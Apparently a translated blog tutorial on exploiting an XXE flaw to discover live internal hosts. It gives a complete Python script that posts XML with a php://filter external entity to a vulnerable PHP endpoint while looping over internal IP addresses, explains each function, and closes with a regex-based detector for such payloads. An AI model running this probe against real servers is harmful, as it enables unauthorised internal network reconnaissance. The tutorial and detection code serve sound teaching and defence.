You should be clear on XXE vulnerabilities by now; if not, see my other two posts:
blog.csdn.net/qq_41918771/article/details/103628721
blog.csdn.net/qq_41918771/article/details/103641745
Internal network host detection

The script first:
```python
import requests


def build_xml(ip):
    # Build the POST body: a DOCTYPE whose external entity points at the target
    # host; the payload uses a bare "ip/" as the php://filter resource
    xml = "<?xml version='1.0' encoding='UTF-8'?>\n"
    xml += "<!DOCTYPE xml[\n"
    xml += "<!ENTITY int SYSTEM 'php://filter/convert.base64-encode/resource=%s/'>\n" % ip
    print(ip)
    xml += "]>\n"
    xml += "<xml>&int;</xml>"  # reference the entity so the parser resolves it
    send_xml(xml)


def send_xml(data):
    # Send the XML to the vulnerable endpoint (scheme required by requests)
    # and print the response body
    x = requests.post("http://192.168.34.69/3.php", data=data, timeout=3).text
    print(x)


for i in range(65, 70):
    try:
        ip = "192.168.34.%d" % i
        build_xml(ip)
    except requests.RequestException:
        # timeout or connection error: treat the host as not alive and move on
        continue
```
In effect this checks whether port 80 is open on each internal host; a host on which it is open is judged alive.

First we build a build_xml function, whose job is to construct the POST body.
```python
def build_xml(ip):
    # Build the POST body: a DOCTYPE whose external entity points at the target host
    xml = "<?xml version='1.0' encoding='UTF-8'?>\n"
    xml += "<!DOCTYPE xml[\n"
    xml += "<!ENTITY int SYSTEM 'php://filter/convert.base64-encode/resource=%s/'>\n" % ip
    print(ip)
    xml += "]>\n"
    xml += "<xml>&int;</xml>"  # reference the entity so the parser resolves it
    send_xml(xml)
```
Next is the send_xml function, which sends the request and receives the result.
```python
def send_xml(data):
    # Send the XML to the vulnerable endpoint (scheme required by requests)
    # and print the response body
    x = requests.post("http://192.168.34.69/3.php", data=data, timeout=3).text
    print(x)
```
Then the main part loops over the range:
```python
for i in range(1, 255):
    try:
        ip = "192.168.34.%d" % i
        build_xml(ip)
    except requests.RequestException:
        # timeout or connection error: treat the host as not alive and move on
        continue
```
Results: for ease of demonstration, only IPs 65 to 72 were probed here.

Content was successfully retrieved from 69.

The line below means: base64-encode the content of the response from ip/.
php://filter/convert.base64-encode/resource=ip/'>
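From the defender's side the payload above has a clear signature: a DOCTYPE that declares an external entity whose resource points at an internal address. The following request-body check is an added example (not code from this post) that extracts such declarations and flags internal targets; the sample body is constructed from the post's payload, and treating a bare `ip/` resource as a host name is an assumption.

```python
import ipaddress
import re

# External entity declarations in a DTD: <!ENTITY name SYSTEM "uri"> or
# <!ENTITY name PUBLIC "id" "uri">; parameter entities (% name) included.
ENTITY_RE = re.compile(
    r"<!ENTITY\s+(?:%\s*)?(?P<name>[\w.-]+)\s+"
    r"(?:SYSTEM\s+|PUBLIC\s+(?:\"[^\"]*\"|'[^']*')\s+)"
    r"(?P<q>[\"'])(?P<uri>.*?)(?P=q)", re.I | re.S)
# php://filter/<chain>/resource=<target>  ->  <target>
PHP_FILTER_RE = re.compile(r"^php://filter/.*?resource=(?P<res>.+)$", re.I | re.S)

# Constructed sample: the body the post's build_xml() sends for one address.
SAMPLE_PROBE = (
    "<?xml version='1.0' encoding='UTF-8'?>\n<!DOCTYPE xml[\n"
    "<!ENTITY int SYSTEM 'php://filter/convert.base64-encode/resource=192.168.34.69/'>\n"
    "]>\n<xml>&int;</xml>")


def target_host(uri):
    """Best-effort host the server would contact when resolving the entity."""
    m = PHP_FILTER_RE.match(uri)
    if m:                          # unwrap the filter chain to its resource
        uri = m.group("res")
    if "://" in uri:               # drop the scheme, if any
        uri = uri.split("://", 1)[1]
    # Assumption: a bare "ip/" resource names a host; file:///x yields ""
    return re.split(r"[/:?#]", uri, maxsplit=1)[0]


def is_internal(host):
    """True for RFC 1918, loopback and link-local addresses, and 'localhost'."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return host.lower() == "localhost"
    return ip.is_private or ip.is_loopback or ip.is_link_local


def find_external_entities(xml):
    """One finding per external entity in the request body; an entity whose
    target is an internal host is the signature of the probe on this page."""
    findings = []
    for m in ENTITY_RE.finditer(xml):
        uri, host = m.group("uri"), target_host(m.group("uri"))
        findings.append({"entity": m.group("name"), "uri": uri, "host": host,
                         "internal": is_internal(host),
                         "php_filter": uri.lower().startswith("php://filter/")})
    return findings
```

A WAF rule or request logger can call find_external_entities() on XML bodies and alert on any finding with internal set, which catches every iteration of the loop above regardless of which address it targets.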
Reference: xz.aliyun./t/3357#toc-11